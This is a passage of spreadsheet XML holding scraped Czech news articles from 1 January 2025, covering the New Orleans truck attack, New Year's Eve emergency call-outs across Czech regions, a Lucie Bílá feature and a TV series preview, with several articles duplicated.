vypadalo hloupě, když předpovídali zánik rádia. Jak říká Tomáš, „rádio vysílané lidmi je něco, co je vždycky součástí přítomnosti.“ Přesto si myslím, že právě starší posluchači Radiu 1 opravdu rozumějí. Znají historii. Vědí, že vzniklo díky jedinečné události a době v českých a evropských dějinách a že zůstalo věrné duchu té doby. Už jen to je úžasný úspěch. A pro mě je to soundtrack druhé poloviny mého života, něco, co se zdálo nemožné představit si v roce 1968 nebo i 1988. Možná by bylo přehnané nazývat Radio 1 „národním pokladem“, ale pro mě jím vždycky bude.</t>
  </si>
  <si>
    <t>20250101_229_3695197833_5da9e5256822e75f4545.html</t>
  </si>
  <si>
    <t>5da9e5256822e75f4545</t>
  </si>
  <si>
    <t>Jak vypadala Lucie Bílá jako malá holka? Platí věta o ošklivém kačátku. Stará fotka vás pobaví</t>
  </si>
  <si>
    <t>Jak vypadala Lucie Bílá jako malá holka? Platí věta o ošklivém kačátku. Stará fotka vás pobaví info 9 fotografií Půvabná zpěvačka Lucie Bílá se během let pořádně změnila. Nyní patří mezi nejlépe oblékané ženy a pyšní se i dokonalou postavou a mladistvým vzhledem. V minulosti holdovala mini sukním a nosila trvalou. Mimo to neměla až tak zářivý úsměv od ucha k uchu, kterým se pyšní dnes. Lucie Bílá je jednou z nejúspěšnějších zpěvaček v České republice . Je několikanásobnou držitelkou cen Týtý, slavíků a Andělů. Obdržela i prestižní Thálii za titulní roli v muzikálu Johanka z Arku. Během let byla její hvězda zářivější a zářivější stejně jako její vzhled. Důkazem toho, že zpěvačka nyní vypadá naprosto dokonale, je i fakt, že má o mnoho let mladšího partnera. Bílá randí s fitness trenérem Radkem Filipim. Sympatický sportovec je o sedmnáct let mladší než populární zpěvačka. Změna stylu Současná popová královna ze začátku své kariéry dost experimentovala se svým vzhledem. Nejdříve si našla zalíbení v rockové image. V té době vystupovala právě s kapelou Arakain . Nosila výrazný make-up, nechyběla ani trvalá. V toto období neměla ani příliš lichotivý úsměv. Postupem let její chrup prošel velkou proměnou a nyní se chlubí naprosto dokonalým úsměvem. Na začátku kariéry se hledala i ve svém stylu. Oblékala si trička s velkými nápisy. V oblibě měla i výrazné pásky a nechyběla ani bižuterie. Změna stylu u ní nastala v roce 2007. V tento rok začala tíhnout k oblečení v černé barvě. Postupem času začala tmavé outfity rozbíjet prvky bílé. Často se na veřejnosti a na společenských událostech ukazuje právě v kombinaci těchto dvou barev. Obléká si především velmi ženské outfity, které jsou prudce elegantní. Svědčí jí především šaty, ve kterých vyniknou její štíhlé nohy. Právě dokonale štíhlou postavu si Bílá udržuje po celý svůj život. K módě měla Bílá vždy blízko. Populární zpěvačka je vyučenou švadlenou. „Táta vždycky říkal: ‚Řemeslo holka, řemeslo. Choď nohama po zemi!‘ Dokonce mě přemlouval, jestli nechci jít do místní sklárny. Sklárna už nefunguje, já celkem jo. Jsem vyučená švadlena a doma si dělám z korálku různé růžence a přívěsky, které potom dražím na aukcích a za peníze kupuji invalidní vozíky,“ vzpomínala pro iDNES. Právě ručně vyrobené šperky často ladí ke svým outfitům a nosí je hrdě do společnosti. close Lucie s Lenkou Filipovou Experimenty s vlasy Lucie Bílá v průběhu let experimentovala i s účesy. Několikrát se předvedla v parukách a příčeskách. Například v době, kdy vystupovala s kapelou Arakain , nosila blonďaté příčesky a konečky měla obarvené na červeno. Poté si oblíbila světle hnědou barvu, nějakou dobu nosila i balayage. Po většinu své kariéry se zpěvačka pyšní dlouhými a hustými vlasy. Byla ovšem doba, kdy nosila krátké černé vlasy. Na přelomu milénia hrála v tomto účesu Johanku z Arku. Stárnutí s grácií Lucie Bílá v posledních letech razantně změnila i životní styl. Přestala pít alkohol . „Už dva roky nepiji alkohol . Nic se nestalo, prostě to přišlo a já zjistila, že se umím skvěle bavit i bez alkoholu . Piji hodně čisté vody a víc cvičím. Chodím na pás, zacvičím si v posilovně, ale nejraději mám protahovací cviky,“ přiznala pro Blesk v roce 2019. Stárnutí bere Bílá s grácií. K dokonalé pleti si invazivními zákroky nepomáhá. „Na mně je vidět, že mám své vrásky ráda. Nemám ráda kroky, ze kterých se nedá odejít. Takové ty nevratné... Mám z toho trošku respekt,“ přiznala otevřeně.</t>
  </si>
  <si>
    <t>20250101_23_3697848728_32489a06e06939e1b1d2.html</t>
  </si>
  <si>
    <t>32489a06e06939e1b1d2</t>
  </si>
  <si>
    <t>V New Orleans vjel řidič auta do lidí deset jich zabil, FBI to má za terorismus</t>
  </si>
  <si>
    <t>V New Orleans vjel řidič auta do lidí deset jich zabil, FBI to má za terorismus Deset lidí dnes zemřelo a dalších nejméně 35 osob utrpělo zranění ve městě New Orleans poté, co nákladní auto vjelo do davu lidí, kteří ještě slavili příchod nového roku, uvedla americká média. Federální úřad pro vyšetřování ( FBI ) incident vyšetřuje jako terorismus. Útočník je podle něj mrtev. Podle médií měl podezřelý v době incidentu u sebe vlajku Islámského státu. České ministerstvo zahraničí nemá informace o tom, že by se nešťastná událost nějak dotkla českých občanů, sdělil ČTK mluvčí Daniel Drake . Policie již dříve uvedla, že řidič si zřejmě počínal úmyslně. Starostka New Orleans LaToya Cantrellová čin označila za „teroristický útok“, ale dodala, že vyšetřování pokračuje. „Muž řídil pickup a jel po Bourbon Street velmi rychle, bylo to velmi úmyslné chování,“ řekla novinářům Anne Kirkpatricková z neworleanské policie. Podle ní se muž snažil přejet co nejvíce lidí. Dodala, že nebyl pod vlivem alkoholu a že postřelil dva policisty. Jejich zdravotní stav je stabilizovaný. Kirkpatricková také uvedla, že většina zraněných jsou místní obyvatelé, nikoli návštěvníci města. „Spolupracujeme s našimi partnery na vyšetřování tohoto útoku jako teroristického činu,“ uvádí se v prohlášení FBI , který případ převzal. FBI rovněž potvrdil předchozí informaci televize CNN a agentury AP, že podezřelého z útoku policie zastřelila. „Dotyčný zaútočil na příslušníky orgánů činných v trestním řízení a nyní je po smrti,“ uvedl úřad. Podezřelý měl v době incidentu vlajku teroristické organizace Islámský stát, uvedla CNN s odvoláním na zdroje z bezpečnostní komunity. Auto vjelo do davu lidí asi tři hodiny po půlnoci místního času (kolem 10:00 SEČ) na ulici Bourbon Street, která je proslulá rušným nočním životem. Stanice CNN uvedla, že New Orleans se dnes večer také chystá na čtvrtfinále akce Sugar Bowl, v něm se utkají týmy dvou univerzit v zápase amerického fotbalu. Podle stanice CNN vyšetřovatelé FBI ověřují i možnost, že ve voze bylo funkční výbušné zařízení. „Byla nalezena improvizovaná výbušná zařízení a snažíme se potvrdit, zda byla použitelná,“ citovala CNN kancelář FBI v New Orleans . Podle agentury AP nalezli policisté také pistoli a útočnou pušku. Americký prezident Joe Biden v prohlášení Bílého domu uvedl , že nařídil vyčlenit veškeré zdroje potřebné pro vyšetření případu. Uvedl také, že žádný útok na Američany nebude tolerován a že násilí v jakékoliv podobě není ospravedlnitelné. Zvolený prezident Donald Trump , který se úřadu ujme 20. ledna, útok bez konkrétních podrobností spojil s nelegální migrací. Svůj příspěvek ohledně událostí v New Orleans začal větou, že „příchozí zločinci jsou daleko horší než zločinci, které máme v naší zemi“. Neuvedl ale, jak tento případ souvisí s migrací. „Naše ambasáda i honorární konzul v New Orleans jsou v kontaktu s místními úřady a situaci monitorují. Nemáme informace o tom, že by se nešťastná událost nějak dotkla českých občanů,“ sdělil ČTK mluvčí české diplomacie Drake . Autor: ČTK Autor ČTK Rubrika transition_slide USA</t>
  </si>
  <si>
    <t>20250101_230_3695390642_72b0cfcd3a5a8978f3f7.html</t>
  </si>
  <si>
    <t>72b0cfcd3a5a8978f3f7</t>
  </si>
  <si>
    <t>Pyrotechnikou se v Praze zranilo devět lidí, padesát jich dostalo pokutu</t>
  </si>
  <si>
    <t>Pyrotechnikou se v Praze zranilo devět lidí, padesát jich dostalo pokutu ČTK Aktualizováno 1. 1. 2025 11:28 Zdravotničtí záchranáři v Praze měli na silvestra rušnější noc než před rokem. Vyjeli k 348 případům, s oslavami příchodu nového roku souvisela stovka. Zranění zábavní pyrotechnikou bylo devět. Policisté v centru Prahy pokutovali za zakázané odpalování pyrotechniky téměř 50 lidí, hlavně cizinců. "Ve speciálu Golem bylo ošetřeno celkem 27 pacientů, z nichž 13 bylo transportováno do zdravotnického zařízení. Nejzávažnější případ představoval úraz hlavy, který si vyžádal napojení pacienta na umělou plicní ventilaci a následný transport do traumacentra," uvedl mluvčí záchranné služby Karel Kirs na sociální síti X. S používáním zábavní pyrotechniky v částech Prahy , kde je to zakázané, nebyly podle policejní mluvčí Evy Kropáčové před půlnocí žádné zásadní problémy, s příchodem nového roku se to ale změnilo hlavně v okolí Václavského a Staroměstského náměstí . "V průběhu noci policisté přistihli přímo při odpalování pyrotechniky v centru města bezmála 50 osob, z nichž se v drtivé většině jednalo o cizince. Těmto přestupcům policisté na místě uložili pokutu v řádech až několika tisíc korun," uvedla mluvčí. V použití pyrotechniky byl nicméně podle ní loňský silvestr jedním z nejklidnějších. Po půlnoci výrazně přibylo také oznámení o potyčkách, konfliktech a dalších událostech spojených s pitím alkoholu . Požárů způsobených neodborným používáním pyrotechniky bylo v Praze o silvestrovské noci 33, nejčastěji hořely odpadkové koše, porosty a krabice od pyrotechniky, uvedl mluvčí pražských hasičů Vojtěch Sosna. Většina požárů od pyrotechniky se stala mezi první a druhou hodinou ranní. reklama Autor: ČTK, Martin Fendrych Autoři ČTK Martin Fendrych Rubrika transition_slide Domácí</t>
  </si>
  <si>
    <t>401720</t>
  </si>
  <si>
    <t>20250101_231_3695216648_82aa17936c81729516d5.html</t>
  </si>
  <si>
    <t>82aa17936c81729516d5</t>
  </si>
  <si>
    <t>Náročný Silvestr pro hasiče: hořelo i v kotelně bytového domu ve Střelicích</t>
  </si>
  <si>
    <t>Náročný Silvestr pro hasiče: hořelo i v kotelně bytového domu ve Střelicích Hned ke dvěma požárům rodinných domů vyjížděli o silvestrovské noci hasiči na Vyškovsku. Nejprve sedm minut před půlnocí hořela jedna z místností rodinného domu v Heršpicích. „Požár byl likvidován ve 2.49 hodin a způsobil škodu v odhadu devět set tisíc korun,“ popsal mluvčí jihomoravských hasičů Jaroslav Mikoška. Hasiči uchránili další majetek za pět milionů korun. play_fill Krimi Krátce před čtvrt na dvě v noci na Nový rok hořelo i v rodinném domě ve Studnici. V péči zdravotníků tam skončili dva lidé. Požár způsobil škodu za 100 tisíc korun a hasiči uchránili majetek v hodnotě dva miliony korun. Po třiadvacáté hodině silvestrovské noci hořelo i v rodinném domě v obci Svatobořice-Mistřín na Hodonínsku. „Požár se podařilo zlikvidovat ve 23.44 hodin a způsobil škodu v odhadu za devět set padesát tisíc korun,“ uvedl mluvčí hasičů. Nedbalost obsluhy kotle na dřevoplyn způsobila požár v kotelně bytového domu na okraji Střelic. Škoda je čtvrt milionu korun. Požár začal po půl desáté v noci a hasiči místo opustili ještě před půlnocí. První letošní požár a nehoda Prvním výjezdem roku 2025 byl pro jihomoravské hasiče požár tújí v zahradě u rodinného domu ve Slavkově u Brna . Na místo vyrazili dvacet minut po půlnoci. První letošní nehodu řešili v ulici Novolíšeňská v Brně. Při srážce dvou osobních aut se zranili tři lidé. Vyškovsko Silvestrovská noc byla pro jihomoravské hasiče historicky nejnáročnější. Od osmé hodiny večer po čtvrtou hodinu ranní vyjížděli k šestapadesáti událostem. Z toho jednačtyřicet bylo požárů. Většinou šlo o menší požáry kontejnerů a odpadu. Zasahovat jsme ale museli i u požárů v rodinných domech. „Při požárech se zranili tři lidé, škody se předběžně pohybují kolem 2,4 milionů korun a našimi zásahy jsme uchránili majetek v hodnotě 13,1 milionů korun,“ doplnil Mikoška Zranění i porod Plné ruce měli na jihu Moravy i zdravotníci. Do šesti hodin ráno vyjížděli k osmi desítkám výjezdů. Ve větší míře šlo o lidi s otravou alkoholem , nebo ty, kteří v opilosti upadli a zranili se. V péči zdravotníků skončili i lidé, kteří se poprali. „Postarali jsme se i o osoby, které si zranily obličej nebo ruce při manipulaci s pyrotechnikou, byla jich přibližně desítka,“ doplnila mluvčí ZZS Jihomoravského kraje Michaela Bothová. Vyjížděli i k několika dopravním nehodám. Po páté hodině ranní vyrazila sanitka do brněnského Starého Lískovce . „Naši zdravotníci přímo v sanitce pomohli při překotném porodu na svět zdravé holčičce. Když na místo přijel i lékařský tým, pomohl s ošetřením miminka a maminky,“ popsala mluvčí. Autor: František Vondrák Autor František Vondrák</t>
  </si>
  <si>
    <t>24660</t>
  </si>
  <si>
    <t>30130</t>
  </si>
  <si>
    <t>20250101_232_3695222101_f31cd5354b3f0455e44f.html</t>
  </si>
  <si>
    <t>f31cd5354b3f0455e44f</t>
  </si>
  <si>
    <t>Nejnáročnější Silvestr pro hasiče na jihu Moravy: hořely i rodinné domy</t>
  </si>
  <si>
    <t>Nejnáročnější Silvestr pro hasiče na jihu Moravy : hořely i rodinné domy Hned ke dvěma požárům rodinných domů vyjížděli o silvestrovské noci hasiči na Vyškovsku. Nejprve sedm minut před půlnocí hořela jedna z místností rodinného domu v Heršpicích. „Požár byl likvidován ve 2.49 hodin a způsobil škodu v odhadu devět set tisíc korun,“ popsal mluvčí jihomoravských hasičů Jaroslav Mikoška. Hasiči uchránili další majetek za pět milionů korun. play_fill Krimi Krátce před čtvrt na dvě v noci na Nový rok hořelo i v rodinném domě ve Studnici. V péči zdravotníků tam skončili dva lidé. Požár způsobil škodu za 100 tisíc korun a hasiči uchránili majetek v hodnotě dva miliony korun. Po třiadvacáté hodině silvestrovské noci hořelo i v rodinném domě v obci Svatobořice-Mistřín na Hodonínsku. „Požár se podařilo zlikvidovat ve 23.44 hodin a způsobil škodu v odhadu za devět set padesát tisíc korun,“ uvedl mluvčí hasičů. Nedbalost obsluhy kotle na dřevoplyn způsobila požár v kotelně bytového domu na okraji Střelic. Škoda je čtvrt milionu korun. Požár začal po půl desáté v noci a hasiči místo opustili ještě před půlnocí. První letošní požár a nehoda Prvním výjezdem roku 2025 byl pro jihomoravské hasiče požár tújí v zahradě u rodinného domu ve Slavkově u Brna . Na místo vyrazili dvacet minut po půlnoci. První letošní nehodu řešili v ulici Novolíšeňská v Brně. Při srážce dvou osobních aut se zranili tři lidé. Vyškovsko Silvestrovská noc byla pro jihomoravské hasiče historicky nejnáročnější. Od osmé hodiny večer po čtvrtou hodinu ranní vyjížděli k šestapadesáti událostem. Z toho jednačtyřicet bylo požárů. Většinou šlo o menší požáry kontejnerů a odpadu. Zasahovat jsme ale museli i u požárů v rodinných domech. „Při požárech se zranili tři lidé, škody se předběžně pohybují kolem 2,4 milionů korun a našimi zásahy jsme uchránili majetek v hodnotě 13,1 milionů korun,“ doplnil Mikoška Zranění i porod Plné ruce měli na jihu Moravy i zdravotníci. Do šesti hodin ráno vyjížděli k osmi desítkám výjezdů. Ve větší míře šlo o lidi s otravou alkoholem , nebo ty, kteří v opilosti upadli a zranili se. V péči zdravotníků skončili i lidé, kteří se poprali. „Postarali jsme se i o osoby, které si zranily obličej nebo ruce při manipulaci s pyrotechnikou, byla jich přibližně desítka,“ doplnila mluvčí ZZS Jihomoravského kraje Michaela Bothová. Vyjížděli i k několika dopravním nehodám. Po páté hodině ranní vyrazila sanitka do brněnského Starého Lískovce . „Naši zdravotníci přímo v sanitce pomohli při překotném porodu na svět zdravé holčičce. Když na místo přijel i lékařský tým, pomohl s ošetřením miminka a maminky,“ popsala mluvčí. Autor: František Vondrák Autor František Vondrák</t>
  </si>
  <si>
    <t>20250101_233_3695221248_2094122a79aa7b99f5c4.html</t>
  </si>
  <si>
    <t>2094122a79aa7b99f5c4</t>
  </si>
  <si>
    <t>Náročný Silvestr pro hasiče: na Hodonínsku hořelo v rodinném domě</t>
  </si>
  <si>
    <t>Náročný Silvestr pro hasiče: na Hodonínsku hořelo v rodinném domě Hned ke dvěma požárům rodinných domů vyjížděli o silvestrovské noci hasiči na Vyškovsku. Nejprve sedm minut před půlnocí hořela jedna z místností rodinného domu v Heršpicích. „Požár byl likvidován ve 2.49 hodin a způsobil škodu v odhadu devět set tisíc korun,“ popsal mluvčí jihomoravských hasičů Jaroslav Mikoška. Hasiči uchránili další majetek za pět milionů korun. play_fill Krimi Krátce před čtvrt na dvě v noci na Nový rok hořelo i v rodinném domě ve Studnici. V péči zdravotníků tam skončili dva lidé. Požár způsobil škodu za 100 tisíc korun a hasiči uchránili majetek v hodnotě dva miliony korun. Po třiadvacáté hodině silvestrovské noci hořelo i v rodinném domě v obci Svatobořice-Mistřín na Hodonínsku. „Požár se podařilo zlikvidovat ve 23.44 hodin a způsobil škodu v odhadu za devět set padesát tisíc korun,“ uvedl mluvčí hasičů. Nedbalost obsluhy kotle na dřevoplyn způsobila požár v kotelně bytového domu na okraji Střelic. Škoda je čtvrt milionu korun. Požár začal po půl desáté v noci a hasiči místo opustili ještě před půlnocí. První letošní požár a nehoda Prvním výjezdem roku 2025 byl pro jihomoravské hasiče požár tújí v zahradě u rodinného domu ve Slavkově u Brna . Na místo vyrazili dvacet minut po půlnoci. První letošní nehodu řešili v ulici Novolíšeňská v Brně. Při srážce dvou osobních aut se zranili tři lidé. Vyškovsko Silvestrovská noc byla pro jihomoravské hasiče historicky nejnáročnější. Od osmé hodiny večer po čtvrtou hodinu ranní vyjížděli k šestapadesáti událostem. Z toho jednačtyřicet bylo požárů. Většinou šlo o menší požáry kontejnerů a odpadu. Zasahovat jsme ale museli i u požárů v rodinných domech. „Při požárech se zranili tři lidé, škody se předběžně pohybují kolem 2,4 milionů korun a našimi zásahy jsme uchránili majetek v hodnotě 13,1 milionů korun,“ doplnil Mikoška Zranění i porod Plné ruce měli na jihu Moravy i zdravotníci. Do šesti hodin ráno vyjížděli k osmi desítkám výjezdů. Ve větší míře šlo o lidi s otravou alkoholem , nebo ty, kteří v opilosti upadli a zranili se. V péči zdravotníků skončili i lidé, kteří se poprali. „Postarali jsme se i o osoby, které si zranily obličej nebo ruce při manipulaci s pyrotechnikou, byla jich přibližně desítka,“ doplnila mluvčí ZZS Jihomoravského kraje Michaela Bothová. Vyjížděli i k několika dopravním nehodám. Po páté hodině ranní vyrazila sanitka do brněnského Starého Lískovce . „Naši zdravotníci přímo v sanitce pomohli při překotném porodu na svět zdravé holčičce. Když na místo přijel i lékařský tým, pomohl s ošetřením miminka a maminky,“ popsala mluvčí. Autor: František Vondrák Autor František Vondrák</t>
  </si>
  <si>
    <t>3490</t>
  </si>
  <si>
    <t>20250101_234_3695181195_6ad3e7e97215b1b58394.html</t>
  </si>
  <si>
    <t>6ad3e7e97215b1b58394</t>
  </si>
  <si>
    <t>Dnes večer budou lidé přilepení k obrazovkám: Na Novu se vrací oblíbený seriál</t>
  </si>
  <si>
    <t>Dnes večer budou lidé přilepení k obrazovkám: Na Novu se vrací oblíbený seriál 1. 1. 2025 Diváci se těší na nové díly oblíbeného seriálu. Foto: TV Nova Dnes večer všichni diváci usednou k televizním obrazovkám, aby se znovu ponořili do děje svých oblíbených postav. Televize Nova po delší pauze vrací oblíbený seriál, který si zamilovali tisíce televizních diváků. V nejnovější epizodě populárního seriálu Ulice se diváci mohou těšit na dramatický začátek roku, jaký si Evžen ( Martin Finger ) a Blanka ( Linda Rybová ) rozhodně nepředstavovali. Co mělo být klidné silvestrovské posezení, se rychle změní v naprostý chaos plný šokujících odhalení. Sociální sítě Chcete vědět vše jako první a získat exkluzivní fotografie, které nikdo nemá? Sledujte nás a připravte se na bohatou nálož aktuálních zpráv. Silvestr u stromečku: Klid před bouří Evžen a Blanka si letos naplánovali klidný Silvestr. Seděli doma u stromečku, stůl se prohýbal pod dobrotami, ale atmosféru rušily petardy za okny. Evžen si neodpustil poznámku o tom, že Blanka maličko přibrala. Foto: TV Nova Ta s lehkou nadsázkou zavrhla další chlebíček a oba zadoufali, že nadcházející rok bude klidnější. Realita na sebe však nenechá dlouho čekat a když Evženovi začne zvonit telefon, bylo jim jasné, že je něco špatně. Novoroční telefonát, který změní plány Hned prvního ledna přijde telefonát od paní Musilové, sousedky ze statku, který Evžena okamžitě vytrhne z poklidného rána. „Zmizely ovečky a můj Lojzík!“ hlásí hystericky sousedka. Evžen s Blankou na nic nečekají, balí poslední věci a vyráží směr statek. Po příjezdu na místo je situace ještě bizarnější. Ohrada sice zůstala otevřená, ale ovečky se nikam nezaběhly. Zato dvůr připomíná bojiště jako z dramatického filmu. Prázdné lahve od alkoholu , rozházené židle a nepořádek na každém kroku jasně ukazují, že Silvestr tady byl víc než divoký. Návštěva Marie přináší další rozruch Do této situace přijíždí neohlášeně Marie (Jitka Smutná), která hledá odpočinek od své rodiny. Rozhodne se ubytovat ve svém apartmánu na statku, ale to ještě netuší, že v posteli objeví nečekaného hosta. Foto: TV Nova Zmizelý Lojza, kterého hledala paní Musilová, není vůbec zraněný a má se vesměs dobře. Ten byl podle všeho součástí divokých oslav a skončil tam, kde by ho nikdo nehledal. Během uklízení Blanka objeví v jedné z místností velkou hromadu polen. Mezi nimi najde bezvládné tělo bratrance jednoho z hostů, který zřejmě nešťastně spadl a zůstal uvězněn. Evžen a Blanka ho společně vyprostí a okamžitě přivolají záchrannou službu. Zdroje: TV Nova, autorský text Související články Autor: Michaela Hanelová Autor person Michaela Hanelová</t>
  </si>
  <si>
    <t>20250101_235_3695267627_77cb86a54ea7c6f6702d.html</t>
  </si>
  <si>
    <t>77cb86a54ea7c6f6702d</t>
  </si>
  <si>
    <t>Rušný Silvestr pro policisty, ale klidný pro záchranáře. V hlavní roli byl opět alkohol</t>
  </si>
  <si>
    <t>Rušný Silvestr pro policisty, ale klidný pro záchranáře. V hlavní roli byl opět alkohol Publikováno Od Karel Janovský ZLÍNSKÝ KRAJ – Zatímco lidé v regionu udělali slavnostní krok ze starého do nového roku, jednotky IZS měly plné ruce práce. Nejvíce napilno měli policisté, vše se ale naštěstí obešlo bez vážných incidentů. Silvestrovské oslavy byly pro policisty o něco rušnější než ty loňské. „Od šesté hodiny večerní do šesté hodiny ranní jsme přijali na operačním středisku Krajského ředitelství policie Zlínského kraje bezmála 140 oznámení, která se týkala především rušení nočního klidu a přestupků proti veřejnému pořádku nebo občanskému soužití. U většiny těchto skutků sehrál roli alkohol ,“ nastínila policejní mluvčí Simona Kyšnerová s tím, že si lidé nejvíce stěžovali na hluk od odpalované pyrotechniky. Oproti loňskému roku bylo zhruba o 40 volání na linku 158 více. Staňte se členy FB skupiny Život ve Zlínském kraji a žádná zpráva z kraje vám neunikne. Sledujte nás na síti X, kde pro vás připravujeme plejádu pestrých zpráv. Během Silvestra a prvních hodin Nového roku nemuseli policisté řešit žádnou závažnější dopravní nehodu. „V průběhu noci jsme však narazili na čtyři podnapilé řidiče, kteří jsou podezřelí ze spáchání trestného činu ohrožení pod vlivem návykové látky. Tři z nich nadýchali nad jedno promile, jeden pak nad dvě promile,“ upřesnila Kyšnerová. Pozor Aktualita: Při střetu s projíždějícím vlakem u Prostějova zemřel muž. S největší pravděpodobností šlo o sebevraždu Nad ránem asistovali u požáru domu v Jaroslavicích , kde se starší muž nadýchal zplodin. Okolo páté hodiny ranní pak došlo ve Zlíně k fyzickému napadení mezi dvěma podnapilými cizinci, kdy jeden z mužů skončil v nemocnici. Okolnostmi incidentu se nyní zabývají zlínští policisté. Opilé děti i poranění od pyrotechniky Podle záchranářů byly proběhlé oslavy srovnatelné s těmi loňskými. Posádky zasahovaly u víc než stovky událostí a operátorky zdravotnického operačního střediska přijaly přes 160 volání na tísňovou linku 155. U řady výjezdů byl společným jmenovatelem alkohol . „Dvě pacientky mladšího věku ho požily takové množství, že po nezbytném vyšetření a ošetření na místě je naše posádky převezly na dětskou jednotku intenzivní péče,“ sdělila mluvčí záchranářů Gabriela Netopilová Sluštíková. Pozor Aktualita: Kyberbezpečnost pro seniory? Policie má nový plán! Zdravotnické týmy zasahovaly také u třech desítek úrazů a další pacienty ošetřily po napadaní. „K mnoha těmto úrazům by nedošlo, pokud by lidé nebyli pod vlivem alkoholu . Řešili jsme také jeden typický úraz spojený s použitím zábavné pyrotechniky. Chlapce petarda poranila v obličeji,“ dodala Sluštíková. Klidná noc pro hasiče. Na Kroměřížsku byl od půlnoci úplný klid Jako poklidnou hodnotí Silvestrovskou noc hasiči. Ti vyjeli v prvních hodinách nového roku k 8 událostem, a to hlavně na Zlínsku . Dvě události pak evidují na Vsetínsku s jednu na Uherskohradišťsku. Na Kroměřížsku nevyjeli od půlnoci do ranních hodin ani jednou. Dvě jednotky zaměstnal před půl pátou ráno k požáru v podkroví rodinného domu v Jaroslavicích . „Hasiči průzkumem zjistili, že se jedná o požár podlahy. Začali proto podlahu rozebírat. Následně dohašovali skrytá ohniska, k jejichž vyhledání využili termokameru. V sedm hodin se jednotky vrátily na své základny. Výše škody i příčina požáru jsou zatím v šetření,“ popsal mluvčí hasičů Kamil Tlusťák. Foto: HZS ZK Celý článek zde: ZDROJ ZDE ….✅ REKLAMU ✅ můžete mít zde například formou zpětného odkazu více: Ceny reklamy …. Doporučujeme: Autor: Karel Janovský Autor person Karel Janovský Rubrika transition_slide Aktuálně</t>
  </si>
  <si>
    <t>20250101_236_3695215265_985e4455adabf23fc65d.html</t>
  </si>
  <si>
    <t>985e4455adabf23fc65d</t>
  </si>
  <si>
    <t>Rušný Silvestr pro policisty, ale klidný pro záchranáře. V hlavní roli byl opět alkohol 1. 1. 2025 Kateřina Špačková KRIMI, Zlínský kraj Foto: ZZS ZK ZLÍNSKÝ KRAJ – Zatímco lidé v regionu udělali slavnostní krok ze starého do nového roku, jednotky IZS měly plné ruce práce. Nejvíce napilno měli policisté, vše se ale naštěstí obešlo bez vážných incidentů. Silvestrovské oslavy byly pro policisty o něco rušnější než ty loňské. „Od šesté hodiny večerní do šesté hodiny ranní jsme přijali na operačním středisku Krajského ředitelství policie Zlínského kraje bezmála 140 oznámení, která se týkala především rušení nočního klidu a přestupků proti veřejnému pořádku nebo občanskému soužití. U většiny těchto skutků sehrál roli alkohol ,“ nastínila policejní mluvčí Simona Kyšnerová s tím, že si lidé nejvíce stěžovali na hluk od odpalované pyrotechniky. Oproti loňskému roku bylo zhruba o 40 volání na linku 158 více. Staňte se členy FB skupiny Život ve Zlínském kraji a žádná zpráva z kraje vám neunikne. Sledujte nás na síti X, kde pro vás připravujeme plejádu pestrých zpráv. Během Silvestra a prvních hodin Nového roku nemuseli policisté řešit žádnou závažnější dopravní nehodu. „V průběhu noci jsme však narazili na čtyři podnapilé řidiče, kteří jsou podezřelí ze spáchání trestného činu ohrožení pod vlivem návykové látky. Tři z nich nadýchali nad jedno promile, jeden pak nad dvě promile,“ upřesnila Kyšnerová. Nad ránem asistovali u požáru domu v Jaroslavicích , kde se starší muž nadýchal zplodin. Okolo páté hodiny ranní pak došlo ve Zlíně k fyzickému napadení mezi dvěma podnapilými cizinci, kdy jeden z mužů skončil v nemocnici. Okolnostmi incidentu se nyní zabývají zlínští policisté. Opilé děti i poranění od pyrotechniky Podle záchranářů byly proběhlé oslavy srovnatelné s těmi loňskými. Posádky zasahovaly u víc než stovky událostí a operátorky zdravotnického operačního střediska přijaly přes 160 volání na tísňovou linku 155. U řady výjezdů byl společným jmenovatelem alkohol . „Dvě pacientky mladšího věku ho požily takové množství, že po nezbytném vyšetření a ošetření na místě je naše posádky převezly na dětskou jednotku intenzivní péče,“ sdělila mluvčí záchranářů Gabriela Netopilová Sluštíková. Zdravotnické týmy zasahovaly také u třech desítek úrazů a další pacienty ošetřily po napadaní. „K mnoha těmto úrazům by nedošlo, pokud by lidé nebyli pod vlivem alkoholu . Řešili jsme také jeden typický úraz spojený s použitím zábavné pyrotechniky. Chlapce petarda poranila v obličeji,“ dodala Sluštíková. Klidná noc pro hasiče. Na Kroměřížsku byl od půlnoci úplný klid Jako poklidnou hodnotí Silvestrovskou noc hasiči. Ti vyjeli v prvních hodinách nového roku k 8 událostem, a to hlavně na Zlínsku . Dvě události pak evidují na Vsetínsku s jednu na Uherskohradišťsku. Na Kroměřížsku nevyjeli od půlnoci do ranních hodin ani jednou. Dvě jednotky zaměstnal před půl pátou ráno k požáru v podkroví rodinného domu v Jaroslavicích . „Hasiči průzkumem zjistili, že se jedná o požár podlahy. Začali proto podlahu rozebírat. Následně dohašovali skrytá ohniska, k jejichž vyhledání využili termokameru. V sedm hodin se jednotky vrátily na své základny. Výše škody i příčina požáru jsou zatím v šetření,“ popsal mluvčí hasičů Kamil Tlusťák. Foto: HZS ZK KRIMI OTROKOVICE – Velmi špatně skončila vyjížďka nezletilé dívky na koloběžce po Otrokovicích . Ta včera vpodvečer nedala přednost autu jedoucímu po hlavní silnici a došlo ke […] KRIMI ZLÍN – O život přišla v sobotu večer čtyřiapadesátiletá žena ve Zlíně . Stalo se tak poté, co ji na kolejích srazil projíždějící vlak. Žena přecházela po […] Zlínský kraj Autor: Kateřina Špačková Autor person Kateřina Špačková Rubrika transition_slide KRIMI</t>
  </si>
  <si>
    <t>20250101_237_3695159546_0714aeda75b05c6f6153.html</t>
  </si>
  <si>
    <t>0714aeda75b05c6f6153</t>
  </si>
  <si>
    <t>Hasiče na konci roku zaměstnaly hořící popelnice, ale i požár bytu v Příbrami</t>
  </si>
  <si>
